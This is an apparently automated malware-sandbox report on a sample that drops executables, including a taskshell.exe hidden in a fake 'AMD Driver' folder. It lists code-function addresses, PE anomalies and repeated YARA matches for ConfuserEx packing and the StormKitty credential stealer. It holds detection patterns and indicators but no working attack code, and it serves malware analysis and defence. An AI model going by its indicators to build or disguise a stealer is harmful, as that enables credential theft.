Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00408C60 6_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040DC11 6_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00407C3F 6_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00418CCC 6_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00406CA0 6_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004028B0 6_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0041A4BE 6_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00418244 6_2_00418244
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00401650 6_2_00401650
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00402F20 6_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004193C4 6_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00418788 6_2_00418788
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00402F89 6_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00402B90 6_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004073A0 6_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F04DA 6_2_021F04DA
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F0D00 6_2_021F0D00
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F6389 6_2_021F6389
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021FA19A 6_2_021FA19A
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F11B0 6_2_021F11B0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021FA1A8 6_2_021FA1A8
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F11A0 6_2_021F11A0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F0CF2 6_2_021F0CF2
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6E040 7_2_00E6E040
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6E030 7_2_00E6E030
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6B7AC 7_2_00E6B7AC
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D5ED9 8_2_00007FFC089D5ED9
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D0819 8_2_00007FFC089D0819
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EE040 12_2_017EE040
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EE030 12_2_017EE030
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EB7AC 12_2_017EB7AC
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_0567D318 12_2_0567D318
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_05674C30 12_2_05674C30
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_05676EDB 12_2_05676EDB
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246E010 16_2_0246E010
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246E020 16_2_0246E020
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246B78C 16_2_0246B78C
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056FD318 16_2_056FD318
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F4C30 16_2_056F4C30
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F6EDB 16_2_056F6EDB
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F4BD9 16_2_056F4BD9
PE file contains strange resources
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: chormuim.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
PE file contains more sections than normal
Source: sqlite3.dll.4.dr Static PE information: Number of sections : 19 > 10
Uses 32bit PE files
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 8.2.chormuim.exe.280000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.2.chormuim.exe.280000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.37fd950.7.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.37fd950.7.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.6.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36cb892.6.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36cb892.6.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4bb6362.12.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4bb6362.12.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.37fd950.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.37fd950.7.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.7.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.chormuim.exe.730000.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.2.chormuim.exe.730000.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.3.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4b05400.8.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4b05400.8.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.4.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.4.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.7.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.chormuim.exe.730000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.2.chormuim.exe.730000.1.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.2.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.23ad390.2.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.23ad390.2.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.4.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.1.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, type: MEMORY Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, type: MEMORY Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, type: MEMORY Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
